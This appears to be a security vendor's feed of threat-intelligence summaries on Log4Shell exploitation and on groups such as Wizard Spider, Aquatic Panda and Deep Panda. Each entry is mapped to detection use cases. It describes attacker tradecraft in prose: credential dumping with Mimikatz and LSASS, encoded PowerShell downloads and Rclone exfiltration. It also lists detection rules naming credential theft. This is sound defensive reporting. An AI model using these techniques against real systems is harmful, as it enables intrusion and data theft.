Unraveling Wizard Spider’s Operations

May 24, 2022

Unraveling Wizard Spider’s Operations

Industry: N/A | Level: Tactical | Source: Hacker News

Intelligence collected from Prodraft revealed the nuances of the cybercriminal group, Wizard Spider’s organizational structure, and goals. The group’s financial successes provides funding to advance their research and development plans, maintaining a effective toolset is a priority for the group. A hash cracking system was discovered by the team capable of unraveling “LM:NTLM hashes, cached domain credentials, Kerberos 5 TGS-REP/AS-REP tickets, KeePass files, MS Office 2013 files, and other types of common hashes.” Additionally, a cold-calling system used to pressure non-responsive victims into complying with the group’s ransom was reviewed. Wizard Spider’s primary method of initial access comes from distributing spam emails containing Qakbot malware or proxy malware such as SystemBC. Additionally, the group is found to be leveraging an exploit kit incorporating the Log4Shell vulnerability. Once the network has been infiltrated, the threat group conducts reconnaissance to identify high-value targets. Cobalt Strike is deployed to assist with lateral movement and the group prioritizes obtaining domain admin privileges to be able to deploy Conti ransomware. Various tools are identified to be used by Wizard Spider including numerous PowerShell scripts, Rubeus, SecretsDump, Adfind, Mimikatz, FileZilla, and Rclone.

Anvilogic Use Cases:

  • Executable Create Script Process
  • Rubeus Commands
  • Locate Credentials
  • Query Registry
  • NTDSUtil.exe execution
  • SecretsDump Credential Harvest
  • Adfind Execution
  • Adfind Commands
  • Mimikatz
  • Rclone Execution
  • Windows FTP Exfiltration

Log4Shell Vulnerability Vast & Abundant

May 03, 2022

Log4Shell Vulnerability Vast & Abundant

Industry: N/A | Level: Tactical | Source: Rezilion

Since December 2021, the attack surface from the Log4Shell vulnerability has continued to be far-reaching. Research from Rezilion identified, four months have gone by, and the vulnerability is present in many software products, and continues to be downloaded and unpatched. Utilizing Sonatype’s “Log4j Download Dashboard”, downloads with vulnerable Log4j versions are still present, as of April 26th, 2022, there has been 35% (395,281) vulnerable downloads. Further analysis has identified many Log4Shell components remain unpatched, “When exploring the components affected by the Log4Shell vulnerability, i.e. components using org.apache.logging.log4j:log4j-core, it appears that out of a total of 17.84K affected packages, only 7.14K are patched for Log4Shell. This means that almost 60% of vulnerable packages are not yet patched!” Various factors could contribute to users continuing to download vulnerable versions, including lack of awareness of the vulnerability, and inability to detect it, as well as the potential of utilizing third-party software containing the vulnerability. The need to detect and/or patch against Log4Shell remains crucial given the severity and ease of the vulnerability. Reported threat groups attempting to exploit the vulnerability include HAFNIUM, APT35, Tunnel Vision, and APT41/Deep Panda.

  • Anvilogic Scenario: Common Log4Shell Payload
  • Anvilogic Use Case: Potential CVE-2021-44228 – Log4Shell

Deep Panda & Fire Chili Rootkits

April 05, 2022

Chinese APT group, Deep Panda has been identified by researchers at FortiGuard Labs to be exploiting the Log4Shell vulnerability utilizing a new digitally signed rootkit dubbed Fire Chili.

Barracuda Threat Spotlight of Log4Shell Attack

March 08, 2022

Barracuda Threat Spotlight of Log4Shell Attack

Industry: N/A | Level: Tactical | Source: Barracuda

Research and monitoring from Barracuda of the Log4Shell vulnerability have identified steady and consistent exploit activity with only a few dips. Sources of attacker IPs largely originate from the US (83%) followed by Japan (10%), Germany and Netherlands (3%) and Russia (1%). Payloads for the vulnerability range from benign YouTube link deliveries, to threats involving cryptominer payloads, VMWare exploits and DDoS malware. There haven’t been observations of ransomware attacks using the log4shell vulnerability currently.

  • Anvilogic Scenario: Unix File Download, Modified, Executed
  • Anvilogic Use Case: Potential CVE-2021-44228 – Log4Shell

Emissary Panda Attack Insight

February 22, 2022

Emissary Panda Attack Insight

Industry: N/A | Level: Tactical | Source: HVS-Consulting

A case study was provided by HVS Consulting’s report, detailed a nine-month campaign threat group, Emissary Panda conducting in three distinct phases;

  1. Initial compromise with privilege escalation, lateral movement and data exfiltration
  2. Maintaining persistence and moving through the environment
  3. Attackers collecting and exfiltrated additional data

HVS, assessed major vulnerabilities for 2021 including ProxyLogon, Confluence and Log4Shell. ProxyLogon became the more widely exploited vulnerability following the discovery of additional Exchange vulnerabilities such as ProxyShell. Threat actors that have exploited Exchange vulnerabilities included Hafnium, Emissary Panda, Fancy Bear and Winnti Group.

  • Anvilogic Scenario: APT27/Emissary Panda
  • Anvilogic Use Cases:
    • Potential ProxyShell
    • Potential Confluence: CVE-2021-26084
    • Potential CVE-2021-44228 – Log4Shell
    • Msiexec Abuse
    • New AutoRun Registry Key

Phosphorus/APT32 New PowerLess Trojan

February 08, 2022

Phosphorus/APT32 New PowerLess Trojan

Industry: N/A | Level: Tactical | Source: Cybereason

Iranian group, Phosphorus/APT35/Charming Kitten, has been identified by Research from Cybereason, utilizing new PowerShell tool “PowerLess Backdoor,” while also exploiting log4shell vulnerabilities. The new malware comes with capabilities to download additional payloads for information stealing, however it’s unique with a new stealth technique as detailed from the report, “to avoid PowerShell detection by running the PowerShell Backdoor in a .NET context rather than spawning the PowerShell process.” The evasion tactic doesn’t prevent PowerShell events from being logged. The only instance in which a PowerShell process is spawned is when a process needs to be killed. Based on reviewed IOCs from Cybereason, the infrastructure utilized for the attack is highly active with an observed IP address having overlap with Memento Ransomware linking a potential connection between the threat actor group and ransomware.

  • Anvilogic Use Cases:
    • Executable Process from Suspicious Folder
    • Suspicious Powershell
    • Potential CVE-2021-44228 – Log4Shell

Log4Shell and Coinminers

February 01, 2022

Log4Shell and Coinminers

Industry: N/A | Level: Operational | Source: BlackBerry

BlackBerry Research & Intelligence and Incident Response (IR) identified attacks from threat group, Prophet Spider, leveraging the Log4j vulnerability against the VMware Horizon platform. Attacks associated with the vulnerability were identified largely from monitoring child processes associated with ws_TomcatService.exe, leading to the execution of scripting interpreters for Powershell or cmd. Following post-exploitation, additional tools could be downloaded with PowerShell via encoded commands or invoke-expression, or from curl. To maintain persistence, scheduled tasks were created along with web shells. Lastly, clean-up of files was also observed to remove indicators.

  • Anvilogic Scenarios:
    • Cryptominer Install
    • Common Log4Shell Payload
  • Anvilogic Use Cases:
    • Potential CVE-2021-44228 – Log4Shell
    • Executable Create Script Process
    •  Command Shell Executed by Process

ONUS Compromised from Log4Shell

December 29, 2021

ONUS Compromised from Log4Shell

Industry: Technology | Level: Tactical | Source: Cystack

Compromise of ONUS, a cryptocurrency platform in Vietnam was reported by CyStack as the company’s payment software from “Cyclos” was vulnerable to CVE-2021-44228/Log4Shell. Insecure misconfigurations with the company’s AWS S3 buckets escalated the attack. Details of the attack involve using Log4Shell payloads to establish a malicious connection, read file “cyclos.properties” containing AWS credentials led attackers to capitalize on the ONUS misconfigurations of granting “AmazonS3FullAccess permission to the access key which allowed attackers to compromise and easily delete all of the S3 buckets. Also on these servers, ONUS had a script to periodically back up the database to S3 which contained the database hostname and username/password as well as backup SQL files. As a consequence, the attackers could access the ONUS database to get user information.” They also downloaded a backdoor on the server disguised as the Linux operating system’s kworker service that tunneled a connection to the attacker’s C2 server using SSH. The impact of the attack involves the compromise of 2 million ONUS, information that includes EKYC and personal data, and password hashes being leaked.

  • Anvilogic Use Cases:
    • Potential CVE-2021-44228 – Log4Shell
    • AWS S3 Bucket Manipulation
    • SSH Pivoting

Aquatic Panda

December 29, 2021

Aquatic Panda

Industry: Education | Level: Operational | Source: CrowdStrike

Observation of the Log4Shell vulnerability from CrowdStrike’s OverWatch team identified an attempted exploit by “Aquatic Panda” against an unnamed academic institution. It started from reviewing suspicious activity from a Tomcat process running under a vulnerable VMware Horizon instance. A combination of a suspicious activity involved the threat actor running multiple connectivity checks through DNS lookups for a specific subdomain and attempting to execute curl and wget commands to retrieve tools that were also peculiar as the execution of Linux commands were on a Windows host for the Apache Tomcat service. As the affected institution worked towards mitigating the attack, OverWatch researchers continued to track the attack identifying reconnaissance activity for system privileges, downloading additional scripts through a PowerShell Base64-encoded command dropping three files with VBS file extensions and when decoded with “cscript.exe” were identified as an EXE, DLL and DAT file. Attempts to harvest credentials were found when to dump LSASS memory and using WinRAR to compress the memory dump for exfiltration. Eventually, the victim organization was able to patch the vulnerable application and thus stopped any further activity from Aquatic Panda.

  • Anvilogic Scenario: Aquatic Panda – Behaviors

Conti & Log4Shell from AdvIntel

December 21, 2021

Conti & Log4Shell from AdvIntel

Industry: N/A | Level: Tactical | Source: AdvIntel

Continued vigilance on the threat landscape due to Log4Shell, has identified the Conti ransomware group showing signs of interest. A report from AdvIntel, detailed Conti had been deprived of new viable attack vectors since November, but had been searching for new methods. It wasn’t until the fallout of Log4Shell the ransomware group finally found what they’d been looking for. Multiple Conti members have been identified initiating scanning activity for the exploit. A recent quote from AdvIntel confirmed, “the criminals pursued targeting specific vulnerable Log4J2 VMware vCenter for lateral movement directly from the compromised network resulting in vCenter access affecting US and European victim networks from the pre-existent Cobalt Strike sessions.”

  • Anvilogic Scenarios:
    • Log4Shell Payload
    • Kinsing Behaviors
    • Unix File Download, Modified, Executed
  • Anvilogic Use Cases:
    • Potential CVE-2021-44228 – Log4Shell
    • File Download (Unix)
    • Modify File Attributes